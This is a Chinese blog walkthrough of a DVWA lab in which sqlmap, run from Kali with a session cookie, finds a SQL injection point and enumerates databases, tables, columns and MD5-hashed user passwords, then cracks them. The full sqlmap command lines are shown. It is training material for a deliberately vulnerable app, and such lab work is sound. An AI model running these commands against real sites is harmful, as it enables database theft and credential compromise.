您的位置: 首页  >  文章  >  运用kali下的Sqlmap工具对dvwa进行sql注入测试(low)

运用kali下的Sqlmap工具对dvwa进行sql注入测试(low)

分类: 文章 2022-10-03 21:20:34

1、 Windows安装dvwa

2、kali虚机安装

3、上面过程不再详述,简述运用kali上的sqlmap工具进行sql注入

查看数据库

运用kali下的Sqlmap工具对dvwa进行sql注入测试(low)
–batch作用是不会询问你输入 全部默认确定省去一个个Y的输入。
运行这个命令后
运用kali下的Sqlmap工具对dvwa进行sql注入测试(low)
出现上面结果,经查询原因是,没有声明一个cookie
运用kali下的Sqlmap工具对dvwa进行sql注入测试(low)
重新进行抓包F12
运用kali下的Sqlmap工具对dvwa进行sql注入测试(low)
再次运行
sqlmap -u “http://X.X.X.X/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=kokp8s2ondcvoclh33mo45g0ck” --batch
运用kali下的Sqlmap工具对dvwa进行sql注入测试(low)

运用kali下的Sqlmap工具对dvwa进行sql注入测试(low)
可以发现系统存在注入点
然后就可以利用下面命令找出所有数据库
sqlmap -u “http://192.168.31.237/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=kokp8s2ondcvoclh33mo45g0ck” --batch --dbs
运用kali下的Sqlmap工具对dvwa进行sql注入测试(low)

得到如下所示数据库
运用kali下的Sqlmap工具对dvwa进行sql注入测试(low)
查看数据库dvwa中的表
命令:
sqlmap -u “http://192.168.31.237/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=kokp8s2ondcvoclh33mo45g0ck” -D dvwa --tables
运用kali下的Sqlmap工具对dvwa进行sql注入测试(low)
结果如图两个表
运用kali下的Sqlmap工具对dvwa进行sql注入测试(low)

查看表中的字段
sqlmap -u “http://192.168.31.237/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=kokp8s2ondcvoclh33mo45g0ck” -D dvwa -T users --column
运用kali下的Sqlmap工具对dvwa进行sql注入测试(low)
结果如下图字段
运用kali下的Sqlmap工具对dvwa进行sql注入测试(low)
查看字段内容
sqlmap -u “http://192.168.31.237/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=kokp8s2ondcvoclh33mo45g0ck” -D dvwa -T users -C “users,password”
运用kali下的Sqlmap工具对dvwa进行sql注入测试(low)

结果如图,都是经过md5加密后
运用kali下的Sqlmap工具对dvwa进行sql注入测试(low)
系统自动**后
得到下图
运用kali下的Sqlmap工具对dvwa进行sql注入测试(low)
sql注入初级实验就做完了。

相关推荐